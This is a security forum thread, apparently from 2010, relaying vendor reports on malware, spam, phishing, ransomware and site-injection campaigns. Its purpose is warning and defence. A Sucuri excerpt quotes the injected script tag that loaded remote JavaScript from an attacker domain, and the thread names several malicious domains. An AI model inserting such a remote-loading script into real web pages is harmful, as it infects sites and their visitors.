2072 replies to this topic

[AplusWebMaster]

FYI...

Koobface gang... (inside Facebook) scareware serving compromised sites
- http://ddanchev.blog...-scareware.html
May 08, 2010 - "... Immediately after the suspension of their automatically registered Blogspot accounts, the gang once again proved that it has contingency plans in place, and started pushing links to compromised sites, in a combination with an interesting "visual social engineering trick", across Facebook, which sadly works pretty well, in the sense that it completely undermines the "don't click on links pointing to unknown sites" type of security tips... This active use of the "trusted reputation chain", just like the majority of social engineering centered tactics of the gang, aim to exploit the ubiquitous weak link in the face of the average Internet user... Clicking on this link inside Facebook leads to... a Koobface bogus video...
* Detection rates:
- setup.exe - Mal/Koobface-E; W32/VBTroj.CXNF - Result: 7/41 (17.08%)
- RunAV_312s2.exe - VirTool.Win32.Obfuscator.hg!b (v); High Risk Cloaked Malware - Result: 4/41 (9.76%) ..."

(More detail and info links at the //ddanchev URL above.)

Edited by AplusWebMaster, 08 May 2010 - 08:55 PM.

[AplusWebMaster]

FYI...

Mothers Day SPAM...
- http://blog.trendmic...ebr...s’-day/
"May 9 is Mothers’ Day for most countries all over the world. As a perfect gift on this particular holiday, spammers decided to honor mothers by spamming e-cards from supposedly legitimate greeting card companies to distribute their malicious wares... an email in HTML format using a template from Florists’ Transworld Delivery (FTD), a floral wire service... the usual short spam in plain text format with a URL that redirects the user to a malicious site... Though the URLs in the spam are not accessible, users should remember that spammers will try just about anything to encourage people to purchase the products they advertise..."

(Screenshots available at the URL above.)

[AplusWebMaster]

FYI...

Google Groups - malicious SPAM...
- http://www.m86securi...trace.1338~.asp
May 9, 2010 - "... large scale spam campaign, with links leading to Fake Anti-virus "scareware". The spam is originating from the Pushdo botnet, which is notorious for these sorts of malicious campaigns. The spam is not that unusual, rather it comes disguised as an 'administrator' message suggesting your mailbox settings need to be updated... The links all lead to various Google Groups pages where files called setup.zip have simply been uploaded by the attackers..."

(Screenshot available at the URL above.)

[AplusWebMaster]

FYI...

Fake Win7 compatibility checker - more malware in SPAM...
- http://www.theregist...11/win7_trojan/
11 May 2010 - "... The malware comes as a zip-based attachment to email messages supposed offering "help" on upgrading Windows boxes. But this "Windows 7 Upgrade Advisor Setup" assistant offers only a Trojan, instead of the promised compatibility checking tool. Windows users who open and run the application end up with systems compromised with a backdoor that allows hackers to insert other viruses and spyware... The main lessons from the attack are that the contents of unsolicited messages are best ignored and, secondly, that virus writers are always trying out new social engineering tricks to dupe the unwary..."

[AplusWebMaster]

FYI...

TorrentReactor.net - drive-by-download - leads to exploit
- http://blogs.paretol...ads-to-exploit/
May 10, 2010 - "The popular website torrentreactor .net is home of a drive-by download. I tested it this morning and the exploit is still live, so please be careful... Wepawet report* indicates “Multiple Adobe Reader and Acrobat buffer overflows”... What’s happening is probably a third party advertisement site that promotes on TorrentReactor has been compromised... The malicious PDF is detected by 6/40 vendors on VirusTotal**..."
* http://wepawet.isecl...1...777&type=js
** http://www.virustota...0a1b-1273512771
File 9E5F92DB78287D690C62AD9DBD6CAA64. received on 2010.05.10 17:32:51 (UTC)
Result: 6/40 (15.00%)

- http://ddanchev.blog...-crimeware.html
May 11, 2010 - "...appears to be taking place through a malicioud ad serving exploits using the NeoSploit kit, which ultimately drops a ZeuS crimeware sample hosted within a fast-flux botnet..."

- http://google.com/sa...entReactor.net/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-13. Malicious software includes 13 trojan(s), 10 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine. Malicious software is hosted on 16 domain(s), including netping.dyndns.dk/, endroiturlredirect.com/, burgsiutrehosa.com/. 13 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fulldls.com/, shtraff.ignorelist.com/, yieldmanager.com/..."

Edited by AplusWebMaster, 15 May 2010 - 08:42 AM.

[AplusWebMaster]

FYI...

Windows “activation” ransomware
- http://sunbeltblog.b...ransomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."

(Screenshots available at the URL above.)

Edited by AplusWebMaster, 17 May 2010 - 09:48 AM.

[AplusWebMaster]

FYI... 'suggest BLOCK THEM ALL...

- http://community.web...gain_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)

- http://www.malwaredo...ordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...

GoDaddy attacks continue...
- http://blog.sucuri.n...at-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
http://blog.sucuri.n...malware-at.html
You can clean up using this script:
http://blog.sucuri.n...for-latest.html
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.n...malware-at.html
May 12, 2010
___

- http://google.com/sa...kdfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/sa...=losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/sa...olasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."

- http://google.com/sa...studioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."

- http://google.com/sa...zettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."

Edited by AplusWebMaster, 19 May 2010 - 02:06 PM.

[AplusWebMaster]

FYI...

Twitter attack - in progress...
- http://www.f-secure....s/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."

[AplusWebMaster]

FYI...

AutoRun worms still alive...
- http://blog.trendmic...ize-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmic...movable-drives/

[AplusWebMaster]

FYI...

Beware the trader bearing free gifts...

- http://gizmodo.com/5544593
May 21, 2010 - "... lecturing in the importance of protecting PCs..."

- http://preview.tinyurl.com/2bjdjau
22 May 2010 - "... over 99 different malicious applications were used in this and last weekends attacks."

[AplusWebMaster]

FYI...

FIFA fans - Scam targets
- http://blog.trendmic...gets-fifa-fans/
May 26, 2010 - "The upcoming “2010 FIFA World Cup” in South Africa is one of the most highly anticipated events in sports history today... two separate SPAM runs leveraging the said event. The first spam sample had a .DOC file attachment that informs recipients of a supposed new contest called “Final Draw” organized in part by the FIFA Organizing Committee. It also tells the recipient of a US$550,000 prize. To claim this, however, the “winner” must immediately coordinate with the releasing agent via the contact information indicated in the email. The email also asks the recipient to give out personal information... This asks recipients to divulge specific information in relation to a fund transfer transaction amounting to a whopping US$10.5 million. Upon agreeing to the proposal, the recipient should supposedly get 30 percent of the said amount. Note that this tactic is reminiscent of the infamous 419 or Nigerian scam, which persuaded users to send cash by promising them a large amount of money in return for their cooperation... In fact, FIFA sternly warned fans of similar online scams*..."
* http://www.pcworld.c...FA_Tickets.html

- http://www.symantec....aise-their-game
May 27, 2010

- http://www.f-secure....s/00001964.html
June 9, 2010

Edited by AplusWebMaster, 10 June 2010 - 11:04 AM.

[AplusWebMaster]

FYI...

44 million stolen gaming credentials uncovered
- http://www.symantec....tials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."

* http://www.symantec....-052013-2257-99

** http://www.symantec....-111201-3853-99

[AplusWebMaster]

FYI...

Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec....-veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http ://255.255.255.255/) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."

- http://krebsonsecuri...y-credit-union/
May 27, 2010 - "... cyber thieves stole more than $100,000 from a small credit union in Salt Lake City last week..."

Edited by AplusWebMaster, 27 May 2010 - 02:47 PM.

[AplusWebMaster]

FYI...

boingboing .com spews drive-by-download malware...
- http://news.cnet.com...005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize...om-malware.html

[AplusWebMaster]

FYI...

Facebook attacked again...
- http://community.web...n-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page look like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to login..."
(Screenshots available at the URL above.)

- http://blog.webroot....ve-by-download/
May 28, 2010

- http://www.sophos.co...facebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."

Edited by AplusWebMaster, 01 June 2010 - 04:51 AM.